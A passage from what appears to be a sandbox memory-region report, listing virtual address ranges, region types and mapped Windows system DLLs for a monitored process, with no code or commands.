37724 start_va = 0x28c0000 end_va = 0x28f1fff entry_point = 0x28c0000 region_type = mapped_file name = "input.dll" filename = "\\Windows\\System32\\input.dll" (normalized: "c:\\windows\\system32\\input.dll") Region: id = 37725 start_va = 0x28c0000 end_va = 0x28f1fff entry_point = 0x28c0000 region_type = mapped_file name = "input.dll" filename = "\\Windows\\System32\\input.dll" (normalized: "c:\\windows\\system32\\input.dll") Region: id = 37726 start_va = 0x28c0000 end_va = 0x28f1fff entry_point = 0x28c0000 region_type = mapped_file name = "input.dll" filename = "\\Windows\\System32\\input.dll" (normalized: "c:\\windows\\system32\\input.dll") Region: id = 37727 start_va = 0x28c0000 end_va = 0x28f1fff entry_point = 0x28c0000 region_type = mapped_file name = "input.dll" filename = "\\Windows\\System32\\input.dll" (normalized: "c:\\windows\\system32\\input.dll") Region: id = 37728 start_va = 0x28c0000 end_va = 0x2914fff entry_point = 0x28c0000 region_type = mapped_file name = "tiptsf.dll" filename = "\\Program Files\\Common Files\\microsoft shared\\ink\\tiptsf.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\tiptsf.dll") Region: id = 37729 start_va = 0x28c0000 end_va = 0x28f1fff entry_point = 0x28c0000 region_type = mapped_file name = "input.dll" filename = "\\Windows\\System32\\input.dll" (normalized: "c:\\windows\\system32\\input.dll") Region: id = 37730 start_va = 0x28c0000 end_va = 0x28defff entry_point = 0x28c0000 region_type = mapped_file name = "sptip.dll" filename = "\\Windows\\IME\\SPTIP.DLL" (normalized: "c:\\windows\\ime\\sptip.dll") Region: id = 37731 start_va = 0x28c0000 end_va = 0x290ffff entry_point = 0x28c0000 region_type = mapped_file name = "tabletextservice.dll" filename = "\\Program Files\\Windows NT\\TableTextService\\TableTextService.dll" (normalized: "c:\\program files\\windows nt\\tabletextservice\\tabletextservice.dll") Region: id = 37732 start_va = 0x28c0000 end_va = 0x290ffff entry_point = 0x28c0000 region_type = mapped_file name = "tabletextservice.dll" filename = "\\Program Files\\Windows NT\\TableTextService\\TableTextService.dll" (normalized: "c:\\program files\\windows nt\\tabletextservice\\tabletextservice.dll") Region: id = 37733 start_va = 0x28c0000 end_va = 0x290ffff entry_point = 0x28c0000 region_type = mapped_file name = "tabletextservice.dll" filename = "\\Program Files\\Windows NT\\TableTextService\\TableTextService.dll" (normalized: "c:\\program files\\windows nt\\tabletextservice\\tabletextservice.dll") Region: id = 37734 start_va = 0x28c0000 end_va = 0x290ffff entry_point = 0x28c0000 region_type = mapped_file name = "tabletextservice.dll" filename = "\\Program Files\\Windows NT\\TableTextService\\TableTextService.dll" (normalized: "c:\\program files\\windows nt\\tabletextservice\\tabletextservice.dll") Region: id = 37735 start_va = 0x28c0000 end_va = 0x290ffff entry_point = 0x28c0000 region_type = mapped_file name = "tabletextservice.dll" filename = "\\Program Files\\Windows NT\\TableTextService\\TableTextService.dll" (normalized: "c:\\program files\\windows nt\\tabletextservice\\tabletextservice.dll") Region: id = 37736 start_va = 0x28c0000 end_va = 0x290ffff entry_point = 0x28c0000 region_type = mapped_file name = "tabletextservice.dll" filename = "\\Program Files\\Windows NT\\TableTextService\\TableTextService.dll" (normalized: "c:\\program files\\windows nt\\tabletextservice\\tabletextservice.dll") Region: id = 37737 start_va = 0x28c0000 end_va = 0x290ffff entry_point = 0x28c0000 region_type = mapped_file name = "tabletextservice.dll" filename = "\\Program Files\\Windows NT\\TableTextService\\TableTextService.dll" (normalized: "c:\\program files\\windows nt\\tabletextservice\\tabletextservice.dll") Region: id = 37738 start_va = 0x28c0000 end_va = 0x2914fff entry_point = 0x28c0000 region_type = mapped_file name = "tiptsf.dll" filename = "\\Program Files\\Common Files\\microsoft shared\\ink\\tiptsf.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\tiptsf.dll") Region: id = 37739 start_va = 0x28c0000 end_va = 0x28f1fff entry_point = 0x28c0000 region_type = mapped_file name = "input.dll" filename = "\\Windows\\System32\\input.dll" (normalized: "c:\\windows\\system32\\input.dll") Region: id = 37740 start_va = 0x29c0000 end_va = 0x2a7ffff entry_point = 0x29c0000 region_type = mapped_file name = "kernelbase.dll.mui" filename = "\\Windows\\System32\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\kernelbase.dll.mui") Region: id = 37741 start_va = 0x2870000 end_va = 0x2871fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002870000" filename = "" Region: id = 37742 start_va = 0x2880000 end_va = 0x28bffff entry_point = 0x0 region_type = private name = "private_0x0000000002880000" filename = "" Region: id = 37743 start_va = 0x2a90000 end_va = 0x2acffff entry_point = 0x0 region_type = private name = "private_0x0000000002a90000" filename = "" Region: id = 37744 start_va = 0x7ffd7000 end_va = 0x7ffd7fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd7000" filename = "" Region: id = 37745 start_va = 0x28c0000 end_va = 0x28c0fff entry_point = 0x0 region_type = private name = "private_0x00000000028c0000" filename = "" Region: id = 37746 start_va = 0x28d0000 end_va = 0x28d0fff entry_point = 0x0 region_type = private name = "private_0x00000000028d0000" filename = "" Region: id = 37747 start_va = 0x28e0000 end_va = 0x28e0fff entry_point = 0x28e0000 region_type = mapped_file name = "msctf.dll.mui" filename = "\\Windows\\System32\\en-US\\msctf.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\msctf.dll.mui") Region: id = 37748 start_va = 0x74360000 end_va = 0x7439bfff entry_point = 0x74360000 region_type = mapped_file name = "oleacc.dll" filename = "\\Windows\\System32\\oleacc.dll" (normalized: "c:\\windows\\system32\\oleacc.dll") Region: id = 37749 start_va = 0x28f0000 end_va = 0x28f0fff entry_point = 0x28f0000 region_type = mapped_file name = "oleaccrc.dll" filename = "\\Windows\\System32\\oleaccrc.dll" (normalized: "c:\\windows\\system32\\oleaccrc.dll") Region: id = 37750 start_va = 0x742d0000 end_va = 0x7435bfff entry_point = 0x742d0000 region_type = mapped_file name = "uiautomationcore.dll" filename = "\\Windows\\System32\\UIAutomationCore.dll" (normalized: "c:\\windows\\system32\\uiautomationcore.dll") Region: id = 37751 start_va = 0x76260000 end_va = 0x76264fff entry_point = 0x76260000 region_type = mapped_file name = "psapi.dll" filename = "\\Windows\\System32\\psapi.dll" (normalized: "c:\\windows\\system32\\psapi.dll") Region: id = 37763 start_va = 0x75bb0000 end_va = 0x75c0efff entry_point = 0x75bb0000 region_type = mapped_file name = "sxs.dll" filename = "\\Windows\\System32\\sxs.dll" (normalized: "c:\\windows\\system32\\sxs.dll") Region: id = 37764 start_va = 0x2900000 end_va = 0x2900fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002900000" filename = "" Region: id = 37765 start_va = 0x2900000 end_va = 0x2900fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002900000" filename = "" Region: id = 37766 start_va = 0x2900000 end_va = 0x2900fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002900000" filename = "" Region: id = 37809 start_va = 0x2900000 end_va = 0x2901fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002900000" filename = "" Region: id = 37810 start_va = 0x2900000 end_va = 0x2901fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002900000" filename = "" Region: id = 37824 start_va = 0x75d60000 end_va = 0x75d8cfff entry_point = 0x75d60000 region_type = mapped_file name = "wintrust.dll" filename = "\\Windows\\System32\\wintrust.dll" (normalized: "c:\\windows\\system32\\wintrust.dll") Region: id = 37825 start_va = 0x2ad0000 end_va = 0x2b9ffff entry_point = 0x0 region_type = private name = "private_0x0000000002ad0000" filename = "" Region: id = 37826 start_va = 0x37e0000 end_va = 0x410ffff entry_point = 0x37e0000 region_type = mapped_file name = "staticcache.dat" filename = "\\Windows\\Fonts\\StaticCache.dat" (normalized: "c:\\windows\\fonts\\staticcache.dat") Region: id = 38232 start_va = 0x2900000 end_va = 0x2905fff entry_point = 0x0 region_type = private name = "private_0x0000000002900000" filename = "" Region: id = 38233 start_va = 0x2910000 end_va = 0x2910fff entry_point = 0x0 region_type = private name = "private_0x0000000002910000" filename = "" Region: id = 38234 start_va = 0x2960000 end_va = 0x2967fff entry_point = 0x0 region_type = private name = "private_0x0000000002960000" filename = "" Region: id = 38235 start_va = 0x2ba0000 end_va = 0x2c7efff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002ba0000" filename = "" Region: id = 38236 start_va = 0x2ba0000 end_va = 0x2c7efff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002ba0000" filename = "" Region: id = 38237 start_va = 0x2a80000 end_va = 0x2a80fff entry_point = 0x0 region_type = private name = "private_0x0000000002a80000" filename = "" Region: id = 38238 start_va = 0x2ad0000 end_va = 0x2ad0fff entry_point = 0x0 region_type = private name = "private_0x0000000002ad0000" filename = "" Region: id = 38239 start_va = 0x2ae0000 end_va = 0x2ae0fff entry_point = 0x0 region_type = private name = "private_0x0000000002ae0000" filename = "" Region: id = 38240 start_va = 0x2af0000 end_va = 0x2af0fff entry_point = 0x0 region_type = private name = "private_0x0000000002af0000" filename = "" Region: id = 38241 start_va = 0x2b00000 end_va = 0x2b00fff entry_point = 0x0 region_type = private name = "private_0x0000000002b00000" filename = "" Region: id = 38242 start_va = 0x2b10000 end_va = 0x2b10fff entry_point = 0x0 region_type = private name = "private_0x0000000002b10000" filename = "" Region: id = 38243 start_va = 0x2b20000 end_va = 0x2b20fff entry_point = 0x0 region_type = private name = "private_0x0000000002b20000" filename = "" Region: id = 38244 start_va = 0x2b30000 end_va = 0x2b30fff entry_point = 0x0 region_type = private name = "private_0x0000000002b30000" filename = "" Region: id = 38245 start_va = 0x2b40000 end_va = 0x2b40fff entry_point = 0x0 region_type = private name = "private_0x0000000002b40000" filename = "" Region: id = 38246 start_va = 0x2b50000 end_va = 0x2b50fff entry_point = 0x0 region_type = private name = "private_0x0000000002b50000" filename = "" Region: id = 38247 start_va = 0x2b60000 end_va = 0x2b9ffff entry_point = 0x0 region_type = private name = "private_0x0000000002b60000" filename = "" Region: id = 38248 start_va = 0x2c80000 end_va = 0x2c80fff entry_point = 0x0 region_type = private name = "private_0x0000000002c80000" filename = "" Region: id = 38249 start_va = 0x2c90000 end_va = 0x2c90fff entry_point = 0x0 region_type = private name = "private_0x0000000002c90000" filename = "" Region: id = 38250 start_va = 0x2ca0000 end_va = 0x2ca0fff entry_point = 0x0 region_type = private name = "private_0x0000000002ca0000" filename = "" Region: id = 38251 start_va = 0x2cb0000 end_va = 0x2cb0fff entry_point = 0x0 region_type = private name = "private_0x0000000002cb0000" filename = "" Region: id = 38252 start_va = 0x2cc0000 end_va = 0x2cc0fff entry_point = 0x0 region_type = private name = "private_0x0000000002cc0000" filename = "" Region: id = 38253 start_va = 0x2cd0000 end_va = 0x2cd0fff entry_point = 0x0 region_type = private name = "private_0x0000000002cd0000" filename = "" Region: id = 38254 start_va = 0x2ce0000 end_va = 0x2ce0fff entry_point = 0x0 region_type = private name = "private_0x0000000002ce0000" filename = "" Region: id = 38255 start_va = 0x2cf0000 end_va = 0x2cf0fff entry_point = 0x0 region_type = private name = "private_0x0000000002cf0000" filename = "" Region: id = 38256 start_va = 0x2d00000 end_va = 0x2d00fff entry_point = 0x0 region_type = private name = "private_0x0000000002d00000" filename = "" Region: id = 38257 start_va = 0x2d10000 end_va = 0x2d10fff entry_point = 0x0 region_type = private name = "private_0x0000000002d10000" filename = "" Region: id = 38258 start_va = 0x2d20000 end_va = 0x2d20fff entry_point = 0x0 region_type = private name = "private_0x0000000002d20000" filename = "" Region: id = 38259 start_va = 0x2d30000 end_va = 0x2d30fff entry_point = 0x0 region_type = private name = "private_0x0000000002d30000" filename = "" Region: id = 38260 start_va = 0x2d40000 end_va = 0x2d40fff entry_point = 0x0 region_type = private name = "private_0x0000000002d40000" filename = "" Region: id = 38261 start_va = 0x2d50000 end_va = 0x2d50fff entry_point = 0x0 region_type = private name = "private_0x0000000002d50000" filename = "" Region: id = 38262 start_va = 0x2d60000 end_va = 0x2d60fff entry_point = 0x0 region_type = private name = "private_0x0000000002d60000" filename = "" Region: id = 38263 start_va = 0x2d70000 end_va = 0x2d70fff entry_point = 0x0 region_type = private name = "private_0x0000000002d70000" filename = "" Region: id = 38264 start_va = 0x2d80000 end_va = 0x2d80fff entry_point = 0x0 region_type = private name = "private_0x0000000002d80000" filename = "" Region: id = 38265 start_va = 0x2d90000 end_va = 0x2d90fff entry_point = 0x0 region_type = private name = "private_0x0000000002d90000" filename = "" Region: id = 38266 start_va = 0x2da0000 end_va = 0x2da0fff entry_point = 0x0 region_type = private name = "private_0x0000000002da0000" filename = "" Region: id = 38267 start_va = 0x2db0000 end_va = 0x2db0fff entry_point = 0x0 region_type = private name = "private_0x0000000002db0000" filename = "" Region: id = 38268 start_va = 0x2dc0000 end_va = 0x2dc0fff entry_point = 0x0 region_type = private name = "private_0x0000000002dc0000" filename = "" Region: id = 38269 start_va = 0x2dd0000 end_va = 0x2dd0fff entry_point = 0x0 region_type = private name = "private_0x0000000002dd0000" filename = "" Region: id = 38270 start_va = 0x2de0000 end_va = 0x2de0fff entry_point = 0x0 region_type = private name = "private_0x0000000002de0000" filename = "" Region: id = 38271 start_va = 0x2df0000 end_va = 0x2df0fff entry_point = 0x0 region_type = private name = "private_0x0000000002df0000" filename = "" Region: id = 38272 start_va = 0x2e00000 end_va = 0x2e00fff entry_point = 0x0 region_type = private name = "private_0x0000000002e00000" filename = "" Region: id = 38273 start_va = 0x2e10000 end_va = 0x2e10fff entry_point = 0x0 region_type = private name = "private_0x0000000002e10000" filename = "" Region: id = 38274 start_va = 0x2e20000 end_va = 0x2e26fff entry_point = 0x0 region_type = private name = "private_0x0000000002e20000" filename = "" Region: id = 38275 start_va = 0x2e30000 end_va = 0x2e39fff entry_point = 0x0 region_type = private name = "private_0x0000000002e30000" filename = "" Region: id = 38276 start_va = 0x2e40000 end_va = 0x2e46fff entry_point = 0x0 region_type = private name = "private_0x0000000002e40000" filename = "" Region: id = 38277 start_va = 0x2e50000 end_va = 0x2e73fff entry_point = 0x0 region_type = private name = "private_0x0000000002e50000" filename = "" Region: id = 38278 start_va = 0x2e80000 end_va = 0x2e89fff entry_point = 0x0 region_type = private name = "private_0x0000000002e80000" filename = "" Region: id = 38279 start_va = 0x2e90000 end_va = 0x2e96fff entry_point = 0x0 region_type = private name = "private_0x0000000002e90000" filename = "" Region: id = 38280 start_va = 0x2ea0000 end_va = 0x2ea9fff entry_point = 0x0 region_type = private name = "private_0x0000000002ea0000" filename = "" Region: id = 38281 start_va = 0x2eb0000 end_va = 0x2eb6fff entry_point = 0x0 region_type = private name = "private_0x0000000002eb0000" filename = "" Region: id = 38282 start_va = 0x2ec0000 end_va = 0x2ef7fff entry_point = 0x0 region_type = private name = "private_0x0000000002ec0000" filename = "" Region: id = 38283 start_va = 0x2f00000 end_va = 0x2f09fff entry_point = 0x0 region_type = private name = "private_0x0000000002f00000" filename = "" Region: id = 38284 start_va = 0x2f10000 end_va = 0x2f10fff entry_point = 0x0 region_type = private name = "private_0x0000000002f10000" filename = "" Region: id = 38285 start_va = 0x2f20000 end_va = 0x2f20fff entry_point = 0x0 region_type = private name = "private_0x0000000002f20000" filename = "" Region: id = 38286 start_va = 0x2f30000 end_va = 0x2f30fff entry_point = 0x0 region_type = private name = "private_0x0000000002f30000" filename = "" Region: id = 38287 start_va = 0x2f40000 end_va = 0x2f40fff entry_point = 0x0 region_type = private name = "private_0x0000000002f40000" filename = "" Region: id = 38288 start_va = 0x2f50000 end_va = 0x2f50fff entry_point = 0x0 region_type = private name = "private_0x0000000002f50000" filename = "" Region: id = 38289 start_va = 0x2f60000 end_va = 0x2f61fff entry_point = 0x0 region_type = private name = "private_0x0000000002f60000" filename = "" Region: id = 38290 start_va = 0x2f70000 end_va = 0x2f70fff entry_point = 0x0 region_type = private name = "private_0x0000000002f70000" filename = "" Region: id = 38291 start_va = 0x2f80000 end_va = 0x2f81fff entry_point = 0x0 region_type = private name = "private_0x0000000002f80000" filename = "" Region: id = 38292 start_va = 0x2f90000 end_va = 0x2f90fff entry_point = 0x0 region_type = private name = "private_0x0000000002f90000" filename = "" Region: id = 38293 start_va = 0x2fa0000 end_va = 0x2fa1fff entry_point = 0x0 region_type = private name = "private_0x0000000002fa0000" filename = "" Region: id = 38294 start_va = 0x2fb0000 end_va = 0x2fb0fff entry_point = 0x0 region_type = private name = "private_0x0000000002fb0000" filename = "" Region: id = 38295 start_va = 0x2fc0000 end_va = 0x2fc1fff entry_point = 0x0 region_type = private name = "private_0x0000000002fc0000" filename = "" Region: id = 38296 start_va = 0x2fd0000 end_va = 0x2fd0fff entry_point = 0x0 region_type = private name = "private_0x0000000002fd0000" filename = "" Region: id = 38297 start_va = 0x2fe0000 end_va = 0x2fe0fff entry_point = 0x0 region_type = private name = "private_0x0000000002fe0000" filename = "" Region: id = 38298 start_va = 0x2ff0000 end_va = 0x2ff0fff entry_point = 0x0 region_type = private name = "private_0x0000000002ff0000" filename = "" Region: id = 38299 start_va = 0x3000000 end_va = 0x3000fff entry_point = 0x0 region_type = private name = "private_0x0000000003000000" filename = "" Region: id = 38300 start_va = 0x3010000 end_va = 0x3010fff entry_point = 0x0 region_type = private name = "private_0x0000000003010000" filename = "" Region: id = 38301 start_va = 0x3020000 end_va = 0x3020fff entry_point = 0x0 region_type = private name = "private_0x0000000003020000" filename = "" Region: id = 38302 start_va = 0x3030000 end_va = 0x3030fff entry_point = 0x0 region_type = private name = "private_0x0000000003030000" filename = "" Region: id = 38303 start_va = 0x3040000 end_va = 0x3040fff entry_point = 0x0 region_type = private name = "private_0x0000000003040000" filename = "" Region: id = 38304 start_va = 0x3050000 end_va = 0x3050fff entry_point = 0x0 region_type = private name = "private_0x0000000003050000" filename = "" Region: id = 38305 start_va = 0x3060000 end_va = 0x3060fff entry_point = 0x0 region_type = private name = "private_0x0000000003060000" filename = "" Region: id = 38306 start_va = 0x3070000 end_va = 0x3070fff entry_point = 0x0 region_type = private name = "private_0x0000000003070000" filename = "" Region: id = 38307 start_va = 0x3080000 end_va = 0x3080fff entry_point = 0x0 region_type = private name = "private_0x0000000003080000" filename = "" Region: id = 38308 start_va = 0x3090000 end_va = 0x3090fff entry_point = 0x0 region_type = private name = "private_0x0000000003090000" filename = "" Region: id = 38309 start_va = 0x30a0000 end_va = 0x30a0fff entry_point = 0x0 region_type = private name = "private_0x00000000030a0000" filename = "" Region: id = 38310 start_va = 0x30b0000 end_va = 0x30b0fff entry_point = 0x0 region_type = private name = "private_0x00000000030b0000" filename = "" Region: id = 38311 start_va = 0x30c0000 end_va = 0x30c0fff entry_point = 0x0 region_type = private name = "private_0x00000000030c0000" filename = "" Region: id = 38312 start_va = 0x30d0000 end_va = 0x30d0fff entry_point = 0x0 region_type = private name = "private_0x00000000030d0000" filename = "" Region: id = 38313 start_va = 0x30e0000 end_va = 0x30e0fff entry_point = 0x0 region_type = private name = "private_0x00000000030e0000" filename = "" Region: id = 38314 start_va = 0x30f0000 end_va = 0x3180fff entry_point = 0x0 region_type = private name = "private_0x00000000030f0000" filename = "" Region: id = 38315 start_va = 0x3080000 end_va = 0x3080fff entry_point = 0x0 region_type = private name = "private_0x0000000003080000" filename = "" Region: id = 38316 start_va = 0x3090000 end_va = 0x3090fff entry_point = 0x0 region_type = private name = "private_0x0000000003090000" filename = "" Region: id = 38317 start_va = 0x30a0000 end_va = 0x30a0fff entry_point = 0x0 region_type = private name = "private_0x00000000030a0000" filename = "" Region: id = 38318 start_va = 0x30b0000 end_va = 0x30b0fff entry_point = 0x0 region_type = private name = "private_0x00000000030b0000" filename = "" Region: id = 38319 start_va = 0x30c0000 end_va = 0x30c0fff entry_point = 0x0 region_type = private name = "private_0x00000000030c0000" filename = "" Region: id = 38320 start_va = 0x30d0000 end_va = 0x30d0fff entry_point = 0x0 region_type = private name = "private_0x00000000030d0000" filename = "" Region: id = 38321 start_va = 0x30e0000 end_va = 0x30e0fff entry_point = 0x0 region_type = private name = "private_0x00000000030e0000" filename = "" Region: id = 38322 start_va = 0x30f0000 end_va = 0x30f0fff entry_point = 0x0 region_type = private name = "private_0x00000000030f0000" filename = "" Region: id = 38323 start_va = 0x3100000 end_va = 0x3100fff entry_point = 0x0 region_type = private name = "private_0x0000000003100000" filename = "" Region: id = 38324 start_va = 0x3110000 end_va = 0x3110fff entry_point = 0x0 region_type = private name = "private_0x0000000003110000" filename = "" Region: id = 38325 start_va = 0x3120000 end_va = 0x3120fff entry_point = 0x0 region_type = private name = "private_0x0000000003120000" filename = "" Region: id = 38326 start_va = 0x3130000 end_va = 0x3130fff entry_point = 0x0 region_type = private name = "private_0x0000000003130000" filename = "" Region: id = 38327 start_va = 0x3140000 end_va = 0x3140fff entry_point = 0x0 region_type = private name = "private_0x0000000003140000" filename = "" Region: id = 38328 start_va = 0x3150000 end_va = 0x3150fff entry_point = 0x0 region_type = private name = "private_0x0000000003150000" filename = "" Region: id = 38329 start_va = 0x3160000 end_va = 0x3160fff entry_point = 0x0 region_type = private name = "private_0x0000000003160000" filename = "" Region: id = 38330 start_va = 0x3170000 end_va = 0x3170fff entry_point = 0x0 region_type = private name = "private_0x0000000003170000" filename = "" Region: id = 38331 start_va = 0x3180000 end_va = 0x3180fff entry_point = 0x0 region_type = private name = "private_0x0000000003180000" filename = "" Region: id = 38332 start_va = 0x3190000 end_va = 0x3190fff entry_point = 0x0 region_type = private name = "private_0x0000000003190000" filename = "" Region: id = 38333 start_va = 0x31a0000 end_va = 0x31a0fff entry_point = 0x0 region_type = private name = "private_0x00000000031a0000" filename = "" Region: id = 38334 start_va = 0x31b0000 end_va = 0x31b0fff entry_point = 0x0 region_type = private name = "private_0x00000000031b0000" filename = "" Region: id = 38335 start_va = 0x31c0000 end_va = 0x31c0fff entry_point = 0x0 region_type = private name = "private_0x00000000031c0000" filename = "" Region: id = 38336 start_va = 0x4110000 end_va = 0x4110fff entry_point = 0x0 region_type = private name = "private_0x0000000004110000" filename = "" Region: id = 38337 start_va = 0x4120000 end_va = 0x4120fff entry_point = 0x0 region_type = private name = "private_0x0000000004120000" filename = "" Region: id = 38338 start_va = 0x4130000 end_va = 0x4130fff entry_point = 0x0 region_type = private name = "private_0x0000000004130000" filename = "" Region: id = 38339 start_va = 0x4140000 end_va = 0x4140fff entry_point = 0x0 region_type = private name = "private_0x0000000004140000" filename = "" Region: id = 38340 start_va = 0x4150000 end_va = 0x4150fff entry_point = 0x0 region_type = private name = "private_0x0000000004150000" filename = "" Region: id = 38341 start_va = 0x4160000 end_va = 0x4160fff entry_point = 0x0 region_type = private name = "private_0x0000000004160000" filename = "" Region: id = 38342 start_va = 0x4170000 end_va = 0x4170fff entry_point = 0x0 region_type = private name = "private_0x0000000004170000" filename = "" Region: id = 38343 start_va = 0x4180000 end_va = 0x4180fff entry_point = 0x0 region_type = private name = "private_0x0000000004180000" filename = "" Region: id = 38344 start_va = 0x4190000 end_va = 0x4190fff entry_point = 0x0 region_type = private name = "private_0x0000000004190000" filename = "" Region: id = 38345 start_va = 0x41a0000 end_va = 0x41a0fff entry_point = 0x0 region_type = private name = "private_0x00000000041a0000" filename = "" Region: id = 38346 start_va = 0x41b0000 end_va = 0x41b0fff entry_point = 0x0 region_type = private name = "private_0x00000000041b0000" filename = "" Region: id = 38347 start_va = 0x41c0000 end_va = 0x41c0fff entry_point = 0x0 region_type = private name = "private_0x00000000041c0000" filename = "" Region: id = 38348 start_va = 0x41d0000 end_va = 0x41d0fff entry_point = 0x0 region_type = private name = "private_0x00000000041d0000" filename = "" Region: id = 38349 start_va = 0x41e0000 end_va = 0x41e0fff entry_point = 0x0 region_type = private name = "private_0x00000000041e0000" filename = "" Region: id = 38350 start_va = 0x41f0000 end_va = 0x41f0fff entry_point = 0x0 region_type = private name = "private_0x00000000041f0000" filename = "" Region: id = 38351 start_va = 0x4200000 end_va = 0x4206fff entry_point = 0x0 region_type = private name = "private_0x0000000004200000" filename = "" Region: id = 38352 start_va = 0x4210000 end_va = 0x4219fff entry_point = 0x0 region_type = private name = "private_0x0000000004210000" filename = "" Region: id = 38353 start_va = 0x4220000 end_va = 0x4226fff entry_point = 0x0 region_type = private name = "private_0x0000000004220000" filename = "" Region: id = 38354 start_va = 0x4230000 end_va = 0x4253fff entry_point = 0x0 region_type = private name = "private_0x0000000004230000" filename = "" Region: id = 38355 start_va = 0x4260000 end_va = 0x4269fff entry_point = 0x0 region_type = private name = "private_0x0000000004260000" filename = "" Region: id = 38356 start_va = 0x4270000 end_va = 0x4276fff entry_point = 0x0 region_type = private name = "private_0x0000000004270000" filename = "" Region: id = 38357 start_va = 0x4280000 end_va = 0x4289fff entry_point = 0x0 region_type = private name = "private_0x0000000004280000" filename = "" Region: id = 38358 start_va = 0x4290000 end_va = 0x4296fff entry_point = 0x0 region_type = private name = "private_0x0000000004290000" filename = "" Region: id = 38359 start_va = 0x42a0000 end_va = 0x42d7fff entry_point = 0x0 region_type = private name = "private_0x00000000042a0000" filename = "" Region: id = 38360 start_va = 0x42e0000 end_va = 0x42e9fff entry_point = 0x0 region_type = private name = "private_0x00000000042e0000" filename = "" Region: id = 38361 start_va = 0x42f0000 end_va = 0x42f0fff entry_point = 0x0 region_type = private name = "private_0x00000000042f0000" filename = "" Region: id = 38362 start_va = 0x4300000 end_va = 0x4300fff entry_point = 0x0 region_type = private name = "private_0x0000000004300000" filename = "" Region: id = 38363 start_va = 0x4310000 end_va = 0x4310fff entry_point = 0x0 region_type = private name = "private_0x0000000004310000" filename = "" Region: id = 38364 start_va = 0x4320000 end_va = 0x4320fff entry_point = 0x0 region_type = private name = "private_0x0000000004320000" filename = "" Region: id = 38365 start_va = 0x4330000 end_va = 0x4330fff entry_point = 0x0 region_type = private name = "private_0x0000000004330000" filename = "" Region: id = 38366 start_va = 0x4340000 end_va = 0x4341fff entry_point = 0x0 region_type = private name = "private_0x0000000004340000" filename = "" Region: id = 38367 start_va = 0x4350000 end_va = 0x4350fff entry_point = 0x0 region_type = private name = "private_0x0000000004350000" filename = "" Region: id = 38368 start_va = 0x4360000 end_va = 0x4361fff entry_point = 0x0 region_type = private name = "private_0x0000000004360000" filename = "" Region: id = 38369 start_va = 0x4370000 end_va = 0x4370fff entry_point = 0x0 region_type = private name = "private_0x0000000004370000" filename = "" Region: id = 38370 start_va = 0x4380000 end_va = 0x4381fff entry_point = 0x0 region_type = private name = "private_0x0000000004380000" filename = "" Region: id = 38371 start_va = 0x4390000 end_va = 0x4390fff entry_point = 0x0 region_type = private name = "private_0x0000000004390000" filename = "" Region: id = 38372 start_va = 0x43a0000 end_va = 0x43a1fff entry_point = 0x0 region_type = private name = "private_0x00000000043a0000" filename = "" Region: id = 38373 start_va = 0x43b0000 end_va = 0x43b0fff entry_point = 0x0 region_type = private name = "private_0x00000000043b0000" filename = "" Region: id = 38374 start_va = 0x43c0000 end_va = 0x43c0fff entry_point = 0x0 region_type = private name = "private_0x00000000043c0000" filename = "" Region: id = 38375 start_va = 0x43d0000 end_va = 0x43d0fff entry_point = 0x0 region_type = private name = "private_0x00000000043d0000" filename = "" Region: id = 38376 start_va = 0x43e0000 end_va = 0x43e0fff entry_point = 0x0 region_type = private name = "private_0x00000000043e0000" filename = "" Region: id = 38377 start_va = 0x43f0000 end_va = 0x43f0fff entry_point = 0x0 region_type = private name = "private_0x00000000043f0000" filename = "" Region: id = 38378 start_va = 0x4400000 end_va = 0x4400fff entry_point = 0x0 region_type = private name = "private_0x0000000004400000" filename = "" Region: id = 38379 start_va = 0x4410000 end_va = 0x4410fff entry_point = 0x0 region_type = private name = "private_0x0000000004410000" filename = "" Region: id = 38380 start_va = 0x4420000 end_va = 0x4420fff entry_point = 0x0 region_type = private name = "private_0x0000000004420000" filename = "" Region: id = 38381 start_va = 0x4430000 end_va = 0x4430fff entry_point = 0x0 region_type = private name = "private_0x0000000004430000" filename = "" Region: id = 38382 start_va = 0x4440000 end_va = 0x4440fff entry_point = 0x0 region_type = private name = "private_0x0000000004440000" filename = "" Region: id = 38383 start_va = 0x4450000 end_va = 0x4450fff entry_point = 0x0 region_type = private name = "private_0x0000000004450000" filename = "" Region: id = 38384 start_va = 0x4460000 end_va = 0x4460fff entry_point = 0x0 region_type = private name = "private_0x0000000004460000" filename = "" Region: id = 38385 start_va = 0x4470000 end_va = 0x4470fff entry_point = 0x0 region_type = private name = "private_0x0000000004470000" filename = "" Region: id = 38386 start_va = 0x4480000 end_va = 0x4480fff entry_point = 0x0 region_type = private name = "private_0x0000000004480000" filename = "" Region: id = 38387 start_va = 0x4490000 end_va = 0x4490fff entry_point = 0x0 region_type = private name = "private_0x0000000004490000" filename = "" Region: id = 38388 start_va = 0x44a0000 end_va = 0x44a0fff entry_point = 0x0 region_type = private name = "private_0x00000000044a0000" filename = "" Region: id = 38389 start_va = 0x44b0000 end_va = 0x44b0fff entry_point = 0x0 region_type = private name = "private_0x00000000044b0000" filename = "" Region: id = 38390 start_va = 0x44c0000 end_va = 0x44c0fff entry_point = 0x0 region_type = private name = "private_0x00000000044c0000" filename = "" Region: id = 38391 start_va = 0x44d0000 end_va = 0x4560fff entry_point = 0x0 region_type = private name = "private_0x00000000044d0000" filename = "" Region: id = 38406 start_va = 0x2970000 end_va = 0x2970fff entry_point = 0x0 region_type = private name = "private_0x0000000002970000" filename = "" Region: id = 38407 start_va = 0x75810000 end_va = 0x7583afff entry_point = 0x75810000 region_type = mapped_file name = "netjoin.dll" filename = "\\Windows\\System32\\netjoin.dll" (normalized: "c:\\windows\\system32\\netjoin.dll") Region: id = 38408 start_va = 0x72b80000 end_va = 0x73ed5fff entry_point = 0x72b80000 region_type = mapped_file name = "imageres.dll" filename = "\\Windows\\System32\\imageres.dll" (normalized: 